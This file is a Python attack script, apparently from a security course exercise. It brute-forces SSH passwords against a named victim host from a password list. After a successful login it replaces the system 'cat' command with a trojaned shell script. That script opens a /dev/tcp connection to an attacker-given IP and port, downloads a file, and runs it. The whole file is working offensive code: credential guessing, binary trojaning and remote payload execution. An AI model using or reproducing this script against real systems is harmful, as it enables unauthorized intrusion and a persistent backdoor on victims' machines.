#!/usr/bin/env python3
from glob import glob
import itertools
import socket
import time
import paramiko
import argparse


def trySSH(hostname, username, password):
    global payload
    # initialize SSH client
    client = paramiko.SSHClient()
    # add to know hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username,
                       password=password, timeout=3)
    except socket.timeout:
        return False
    except paramiko.AuthenticationException:
        return False
    except paramiko.SSHException:
        # sleep for a minute
        time.sleep(60)
        return trySSH(hostname, username, password)
    else:
        print("connection was established successfully")
        client.exec_command('cp cat c')
        time.sleep(1)
        client.exec_command('zip c.zip c')
        time.sleep(1)
        client.exec_command(payload)
        time.sleep(1)
        client.exec_command('./c c.zip >> cat')
        time.sleep(1)
        client.exec_command(r'echo -n -e \\xaf\\xbe\\xad\\xde >> cat')
        client.exec_command('rm c.zip')
        client.exec_command('rm c')
        return True


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("victim")
    parser.add_argument("ip")
    parser.add_argument("port")

    args = parser.parse_args()
    victim = args.victim
    ip = args.ip
    port = args.port

    payload = "printf '#!/bin/bash\nexec 5<>/dev/tcp/"
    payload += ip
    payload += '/'
    payload += port
    payload += ";cat <&5 > w;chmod +x w;./w "

    #length aside from the tailing size
    length = len(payload)+7
    #length of tailing size
    length += len(str(length))
    payload += str(length)
    
    payload += " \"$1\";exit 0;\n' > cat"

    passlist = open('materials/victim.dat').read().splitlines()
    els = []
    for i in range(1, len(passlist)+1):
        els.extend([list(x) for x in itertools.combinations_with_replacement(passlist, i)])
    for password in els:
        if trySSH(victim, 'csc2022', ''.join(password)):
            break